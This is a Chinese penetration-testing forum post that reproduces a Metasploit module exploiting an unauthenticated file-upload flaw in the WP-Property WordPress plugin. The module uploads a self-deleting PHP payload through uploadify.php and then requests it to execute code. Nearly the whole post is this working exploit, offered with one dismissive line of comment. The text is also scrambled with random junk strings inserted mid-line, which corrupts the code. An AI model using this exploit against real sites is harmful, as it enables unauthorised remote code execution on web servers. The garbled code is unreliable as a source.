中国网络渗透测试联盟

标题: WordPress WP-Property PHP 文件上传漏洞 [打印本页]
作者: admin    时间: 2013-1-4 19:51
标题: WordPress WP-Property PHP 文件上传漏洞
WordPress WP-Property PHP 文件上传漏洞3 B, m1 X% y' Z9 W

. _5 ^/ J& _% G ## # This file is part of the Metasploit Framework and may be subject to
/ S- X! x" a- r. I. S
. J) l9 Q! c" M' A- Z, z( T/ M# redistribution and commercial restrictions. Please see the Metasploit* p$ M: n; b- C7 f1 x9 t5 {$ d
* |. l* x9 x2 C  {  |+ g
# Framework web site for more information on licensing and terms of use.& e  M7 X1 X4 @+ |

# f( D  N  v( K$ m6 B2 Q$ I( k#   http://metasploit.com/framework/ ##/ ]) T) q  U" A% m5 `

( V) o- \) f- M9 I0 I% E 5 r. ?! o+ R2 W; T9 r* ]

' O  F" l& _5 }( Q; k
4 x3 F, V* N7 k) e* B
& U9 @. l/ t$ m# `, R3 {2 R2 ^require 'msf/core'
6 J% P3 V; K( |' C) a/ nrequire 'msf/core/exploit/php_exe'5 t( Z) V1 x5 B1 ]4 @

. Q6 o7 L  l) sclass Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking       include Msf::Exploit::Remote::HttpClient     include Msf::Exploit:hpEXE       def initialize(info = {})         super(update_info(info,             'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',) u+ c+ P) V$ F6 y: s0 l: [+ Q
'Description'    => %q{6 n) A- J9 L0 o# J3 B8 b
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress                 plugin. By abusing the uploadify.php file, a malicious user can upload a file to a                 temp directory without authentication, which results in arbitrary code execution.             },             'Author'         =>
5 J; P9 S) `+ d! I$ y& d2 l[
" x& m( v1 n4 H3 \- C'Sammy FORGIT', # initial discovery
7 R* }0 _% w. B1 {: q  c$ N'James Fitts <fitts.james[at]gmail.com>' # metasploit module. s8 O( G, L  d' t" ~
],
" v. L. M( F; m'License'        => MSF_LICENSE,, K- V9 v9 R% N2 C$ L% I- p; C( W
'References'     =>
' ^5 e" C9 k7 q$ h+ L8 z0 s. j[7 }6 ~% G% @" G/ d- b5 {
[ 'OSVDB', '82656' ],
$ P; \1 `4 ~$ P- H6 t0 S% n) x6 a[ 'BID', '53787' ],
; M# z6 U2 }: M: K) v[ 'EDB', '18987'],4 |, X: U. \8 r2 T4 y% h! P
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]7 m1 Z0 i6 m1 t# e. e! T
],
' s) I9 m1 e3 u) i2 j# Q2 W  u6 G'Payload'        =>
2 h& @- ]; l! |' k! a{$ R; W$ T+ _+ g: d; L
'BadChars' => "\x00",
" c2 g7 l; B3 \},
0 l/ E/ Z- t9 f0 m/ f, N" h' B'Platform'       => 'php',
9 ]4 J  [( u! k'Arch'           => ARCH_PHP,
, f4 X' j/ M( T/ K2 p'Targets'        =>6 M4 X. a1 l8 ?1 Y! D  e9 `$ G
[
$ F1 N& Z6 k" v+ |& t[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
( g. L% y8 K" M4 b[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
2 k( a+ g1 v; \/ W],# Q# S7 B3 s8 h# L
'DefaultTarget'  => 0,( g: r0 z6 C$ F% j
'DisclosureDate' => 'Mar 26 2012')): M2 C% V; B" T9 B) [; |, s

+ ?: ~8 |3 L, }/ F( {6 Zregister_options(4 U, J' F3 c; _" Z* G1 ?( E. j
[
9 m' E" I  g6 v7 Q8 t! R. TOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
# z! }  y6 }# _! N) H( J* ^], self.class)9 [# ~& b5 c) S
end: T$ b& o$ Y2 x8 }/ s
/ D, {  `0 m, U/ W8 l8 H
def check( D1 P/ @2 I8 t, y1 }
uri =  target_uri.path
2 [4 `: v) H3 @9 |& uuri << '/' if uri[-1,1] != '/'           res = send_request_cgi({             'method' => 'GET',1 @9 l% J6 P  `( N% i! M
'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
* c; Q. q1 j- I/ b& d})
) N; F5 _. X5 ^9 O5 D4 Y
, \( u. n3 ~& Pif not res or res.code != 200
& j: Z% @9 z. x* Y' B' I- Zreturn Exploit::CheckCode::Unknown; p+ B' q* l' L3 J: q9 @
end+ ?  H# g3 \0 Z6 v. J

6 x  s0 B8 @7 Y3 Vreturn Exploit::CheckCode::Appears
4 x" H& P: S' n. R" [  I3 kend
8 {& [2 k/ [6 `* z, J/ |  b& ]- B6 q- @* r- W% e) b
def exploit( D  f+ B1 ?/ E$ [% C8 A
uri =  target_uri.path, y7 g4 i2 R5 U' @
uri << '/' if uri[-1,1] != '/'           peer = "#{rhost}:#{rport}"           @payload_name = "#{rand_text_alpha(5)}.php"         php_payload = get_write_exec_payload(:unlink_self=>true)0 f9 C4 U1 |( f4 K: w! e- _3 k

+ _/ m0 y0 x3 O/ o9 jdata = Rex::MIME::Message.new3 g# p2 \. y  X/ \) _
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")8 C5 z5 E! M, L8 _! q: e: d0 w
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
: U: I5 r8 l9 L% |" X9 X, b8 {% q: Apost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
0 a- N' c& h& ^7 c" c
# T6 C/ _1 l: o$ N& Qprint_status("#{peer} - Uploading payload #{@payload_name}")
3 e6 w0 R# H$ z7 _res = send_request_cgi({
7 o  B& _: K9 N4 L; u4 a6 O'method' => 'POST',
8 B9 w/ ~: K2 h- Z; |. r'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
, z/ v' L! ]6 _& F5 d  X4 [5 C0 U'ctype'  => "multipart/form-data; boundary=#{data.bound}",
& ^% D8 K# x; U7 V'data'   => post_data
6 I  R  e8 y, _4 r) D/ k% H$ f})2 j& Q9 i; O3 z7 x/ h8 t
- V- {9 d2 d& W
if not res or res.code != 200 or res.body !~ /#{@payload_name}/# N1 X8 d/ J% k0 m( x9 o; C
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
5 K: O5 B& N0 Y5 r4 Iend# N1 ^! j8 F& G$ b; Z

( W5 e& y5 N0 u/ Uupload_uri = res.body
1 e" H9 v2 @* p2 Z3 j+ _
4 N5 {& |" X; o, b( _% gprint_status("#{peer} - Executing payload #{@payload_name}")
9 s; Y. k3 A; W& v) Sres = send_request_raw({, K1 Z+ a8 j+ i
'uri'    => upload_uri,0 Y2 J! c) E9 k) k+ _4 Y4 g
'method' => 'GET'
7 d- g2 c* {/ T- k' a% V})
  S' v. Z5 H7 B, g% U- j7 dend
$ V0 z5 q( y' {1 N& K* ?end$ G, n1 O7 y6 k5 B- N) p
1 _& n/ L* N, D0 z
不要问我这写的是什么 怎么利用 我是说msf., ]- s, v- c$ }7 g$ {: g$ C
2 o6 `: p* b7 J2 D




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2